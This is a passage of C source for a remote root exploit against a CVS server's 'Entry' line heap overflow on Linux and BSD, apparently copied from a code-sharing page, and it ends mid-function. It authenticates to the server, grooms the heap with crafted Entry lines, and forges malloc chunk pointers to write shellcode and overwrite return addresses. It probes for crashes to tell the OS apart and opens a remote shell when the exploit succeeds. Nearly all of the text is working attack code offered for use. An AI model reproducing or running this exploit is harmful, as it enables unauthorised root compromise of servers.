📄 cvs remote entry line heap overflow root exploit (linuxfreebsd).txt
字号:
int detect_remote_os(void)
{
info("Guessing if remote is a cvs on a linux/x86...\t");
if(range_crashed(0xbfffffd0, 0xbfffffd0 + 4) ||
!range_crashed(0x42424242, 0x42424242 + 4))
{
printf(VERT"NO"NORM", assuming it's *BSD\n");
isbsd = 1;
return (0);
}
printf(VERT"Yes"NORM" !\n");
return (1);
}
void bsd_exploitation(void)
{
printf("Exploiting %s on a *BSD\t", host);
do_auth();
fill_holes();
evil_entry();
start_gzip();
try_exploit();
}
void linux_exploitation(ulong addr, int sz)
{
char * buf;
printf("Exploiting %s on a Linux\t", host);
cvs_conn();
fflush(stdout);
memcpy_addr(addr, SHELLCODE_ADDR, sz);
memcpy_remote(RANGE_VALID, SHELLCODE_ADDR, ab_shellcode,
sizeof(ab_shellcode) - 1);
memcpy_flush();
nprintf(CVS_FLUSH);
buf = flush_sock();
if (strstr(buf, MAGICSTRING))
{
printf(EXPLOITROX);
sh(sock);
}
#ifdef SHITTEST
sleep(333);
#endif
nclose();
info(BAD_TRIP);
}
int do_auth(void)
{
char * your_mind;
nopen(host, port);
nprintf(CVS_LOGIN, root, user, scramble(pass));
your_mind = flush_sock();
if (!strstr(your_mind, CVS_AUTH_SUCCESS))
QUIT(ERR_AUTHFAILED);
free(your_mind);
nprintf(CVS_SEND_ROOT, root);
}
void fill_heap(void)
{
int c;
for (c = 0; c != MAX_FILL_HEAP; c++)
nprintf(CVSENTRY"CCCCCCCCC/CCCCCCCCCCCCCCCCCCCCCCCCCC"
"CCCCCCCCCCCCCCCCCCCCC/CCCCCCCCCCC\n");
for (c = 0; c != (MAX_FILL_HEAP * 2); c++)
nprintf(CVSENTRY"CC/CC/CC\n");
}
void cvs_conn(void)
{
do_auth();
fill_heap();
}
char * get_dummy(void)
{
static char buf[2048] = { '\0' };
memset(buf, '\0', sizeof(buf));
sprintf(buf, CVSENTRY"B%s/", DUMMY2);
memset(buf + strlen(buf), 'B', SIZEBUF - strlen(DUMMY2));
strcat(buf, "/\n");
return (&buf[0]);
}
char * build_chunk(ulong addr1, ulong addr2, int i)
{
char num[20];
char * buf = get_dummy();
if (i != -1)
{
sprintf(num, "%d", i);
memcpy(buf + NUM_OFF7, num, strlen(num));
}
*(int *) (buf + FAKECHUNK + CHUNK_SIZE) = SIZE_VALUE;
*(int *) (buf + FAKECHUNK + CHUNK_FD) = SET_FD(addr1);
*(int *) (buf + FAKECHUNK + CHUNK_BK) = SET_BK(addr2);
return (buf);
}
void memcpy_flush(void)
{
int i = 0, j;
char * buf;
char num[20];
if (!cur_num)
return;
buf = get_dummy();
for (i = 0; i != cur_num - 1; i++)
{
sprintf(buf, CVS_ISMOD"%s\n", DUMMY2);
sprintf(num, "%d", i);
memcpy(buf + CVS_ISMODSZ, num, strlen(num));
for (j = 0; j != OVERFLOW_NUM; j++)
nprintf(buf);
}
return;
}
void memcpy_remote(ulong range, ulong addr, uchar * buf,
int sz)
{
int i;
if (sz <= 0)
return ;
if (!cur_num)
nprintf(build_chunk(DUMMY_ADDR, DUMMY_ADDR, cur_num++));
for (i = sz - 1, addr += (sz - 1); i >= 0; i--, addr--)
{
range &= 0xFFFFFF00;
range += buf[i];
if (!bad_addr(SET_FD(addr)) && !bad_addr(range))
nprintf(build_chunk(addr, UNSET_BK(range), cur_num++));
}
return;
}
void memcpy_addr(ulong eipaddr, ulong shelladdr, int sz)
{
int aff = (sz / 4) / PCNT, j;
if (!cur_num)
nprintf(build_chunk(DUMMY_ADDR, DUMMY_ADDR, cur_num++));
putchar('[');
for (j = 0; j != PCNT; j++)
putchar(' ');
putchar(']');
for (j = 0; j != PCNT + 1; j++)
putchar('\b');
fflush(stdout);
for (j = 0; sz >= 0 && eipaddr <= HIGH_STACK; sz -= 4, eipaddr += 4, j++)
{
if (j == aff)
{
putchar('#');
fflush(stdout);
j = 0;
}
if (!bad_addr(SET_FD(eipaddr)) && !bad_addr(shelladdr))
nprintf(build_chunk(eipaddr, UNSET_BK(shelladdr), cur_num++));
}
printf("#\t");
fflush(stdout);
return;
}
int range_crashed(int addr, int addr2)
{
char * buf;
cvs_conn();
nprintf(build_chunk(DUMMY_ADDR, DUMMY_ADDR, cur_num++));
for (; addr < addr2; addr += 8)
if (!bad_addr(SET_FD(addr)) && !bad_addr(SET_BK(addr + 4)))
nprintf(build_chunk(addr, addr + 4, cur_num++));
memcpy_flush();
nprintf(CVS_FLUSH);
buf = flush_sock();
if (strstr(buf, CVS_OK) || strstr(buf, CVS_UNKNOW)
|| strstr(buf, CVS_ERROR) || strstr(buf, CVS_ERROR2))
{
nclose();
return (0);
}
#ifdef SHITTEST
sleep(333);
#endif
nclose();
return (1);
}
void zflush(int finish)
{
static char outbuf[65536];
zout.next_in = zbuf;
zout.avail_in = zbufpos;
do {
zout.next_out = outbuf;
zout.avail_out = sizeof(outbuf);
if (deflate(&zout, finish ? Z_FINISH : Z_PARTIAL_FLUSH) == -1)
QUIT("zflush : deflate failed !\n");
zsent += sizeof(outbuf) - zout.avail_out;
write_sock(outbuf, sizeof(outbuf) - zout.avail_out);
} while (zout.avail_out == 0 && zout.avail_in != 0);
zbufpos = 0;
return;
}
int zprintf(char *fmt, ...)
{
static char buf[65536];
int len;
va_list ap;
va_start(ap, fmt);
len = vsnprintf(buf, sizeof(buf) - 1, fmt, ap);
usent += len;
if ((sizeof(zbuf) - zbufpos) < (len))
zflush(0);
memcpy(zbuf + zbufpos, buf, len);
zbufpos += len;
if (zbufpos >= sizeof(zbuf))
QUIT(ERR_ZPRINTF);
return (len);
}
int zgetch(void)
{
static char * outbuf = NULL;
static int outpos = 0, outlen = 0;
static char rcvbuf[32768];
static char dbuf[4096];
int got;
retry:
if (outpos < outlen && outlen)
return outbuf[outpos++];
free(outbuf);
outlen = 0;
outbuf = NULL;
got = read_sock(rcvbuf, sizeof(rcvbuf));
if (got <= 0)
QUIT(ERR_READSOCK);
zin.next_in = rcvbuf;
zin.avail_in = got;
while (1)
{
int status, dlen;
zin.next_out = dbuf;
zin.avail_out = sizeof(dbuf);
status = inflate(&zin, Z_PARTIAL_FLUSH);
switch (status)
{
case Z_OK:
outpos = 0;
dlen = sizeof(dbuf) - zin.avail_out;
outlen += dlen;
outbuf = realloc(outbuf, outlen);
memcpy(outbuf + outlen - dlen, dbuf, dlen);
break;
case Z_BUF_ERROR:
goto retry;
default:
QUIT(ERR_INFLATE);
}
}
}
char * zgets(void)
{
static char buf[32768];
char * p = buf;
int c;
while (1)
{
c = zgetch();
if (c == '\n')
break;
*p++ = c;
if (p > buf + sizeof(buf))
{
p--;
break;
}
}
*p = 0;
return (buf);
}
void start_gzip(void)
{
nprintf(CVS_GZIP"1\n");
deflateInit(&zout, 9);
inflateInit(&zin);
return;
}
void fill_holes(void)
{
int i, j;
for (i = 0; i < 10; i++)
nprintf(CVSENTRY"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n");
for (i = 0; i < 10; i++)
nprintf(CVSENTRY"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n");
for (i = 0; i < NHOLES; i++)
{
nprintf(CVSENTRY"ac1db1tch3z/blackhat4life/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n");
for (j = 0; j < 5; j++)
nprintf(CVSENTRY"%.*X\n", j * 8 - 2, 11);
}
nprintf("Set x=%472X\n", 10);
return;
}
void evil_entry(void)
{
int i;
ulong heap = heapbase;
nprintf("Set x=\n");
nprintf(CVSENTRY"/AB/AA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",
heap & 0xff, (heap >> 8) & 0xff, (heap >> 16) & 0xff, (heap >> 24),
heap & 0xff, (heap >> 8) & 0xff, (heap >> 16) & 0xff, (heap >> 24),
heap & 0xff, (heap >> 8) & 0xff, (heap >> 16) & 0xff, (heap >> 24),
heap & 0xff, (heap >> 8) & 0xff, (heap >> 16) & 0xff, (heap >> 24));
}
void try_exploit(void)
{
time_t last, now;
int i, j, len, o;
static char sc[SCSIZE+1];
for (i = 0; i < OFFSET; i++)
zprintf(CVS_ISMOD"AB\n");
printf("[", SCSIZE * scnum / 1024);
for (i = 0; i < PCNT; i++)
putchar(' ');
printf("]");
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -